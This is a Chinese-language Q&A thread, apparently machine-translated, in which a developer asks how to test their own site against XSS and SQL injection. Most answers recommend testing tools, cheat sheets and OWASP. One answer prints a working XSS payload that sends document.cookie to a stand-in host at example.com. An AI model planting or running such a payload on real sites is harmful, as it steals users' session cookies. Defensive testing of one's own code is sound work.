我正在测试我的脚本,看看它们是否会阻止xss和sql注入。有人可以为我提供一些基本但很好的脚本,这些脚本会“入侵”我的程序。我希望在它上线之前测试我的脚本。
编辑:谢谢大家的链接,它们包含大量信息。但对于初学者来说,安全性是否有推荐的网站?我不确定我是否准备直接深入了解安全问题。 我喜欢waiwai933推荐的链接。
答案 0 :(得分:5)
每种情况都需要不同的脚本,因此没有任何人可以提供的“一刀切”。在您确定您的站点是安全的之前,需要测试的脚本列表会有数千个。
您可能需要检查允许您测试SQL注入的Firefox或Chrome插件。我建议这个,但你也可以寻找其他人:https://addons.mozilla.org/en-US/firefox/addon/6727。它的作用是它允许你提供一个注入脚本列表,默认情况下它可能会提供一些,然后一旦你激活它,它就会用这些脚本轰炸你的站点并让你看到漏洞的位置。
我建议此网站使用一些示例XSS脚本:http://ha.ckers.org/xss.html
答案 1 :(得分:2)
http://ha.ckers.org/xss.html的XSS备忘单是XSS测试的一个很好的集合。不过,我不建议您实施自己的XSS检查程序;它比检测SQL注入困难得多(你可能会在看到cheatsheet中的一些例子时意识到)。唯一可靠的方法是解析代码,从中构建DOM树并将该树转换回HTML,这是很多工作,其他人已经完成了。使用类似HTML Purifier的内容。
答案 2 :(得分:1)
最简单的一个不被浏览器阻止而且如果你没有strip_tags()就可以轻松发生的是以下代码:
<script>(new Image).src = 'http://example.com/logSessions.php?s=' + document.cookie;</script>
答案 3 :(得分:1)
Googe的新jarslberg教学网站是一个很好的资源,可以教你如何编写和防御XSS以及其他一些安全攻击。
答案 4 :(得分:1)
+1,关心和了解足够的问题。由于您要求提出安全问题,如果您还不熟悉,我建议您推荐OWASP网站。除了你所问的之外,你会发现各种各样的信息,更不用说防止各种攻击的信息了。该网站是Web开发人员的宝贵工具。
答案 5 :(得分:1)
http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
我已经使用这个工具获得了一些很好的结果。
答案 6 :(得分:0)
您可以尝试使用Acunetix安全扫描程序,默认情况下它不会扫描XSS和MySQL注入,但即使是其他类型的攻击也是如此。该程序实际上模拟了一个浏览器,可以像登录用户一样工作。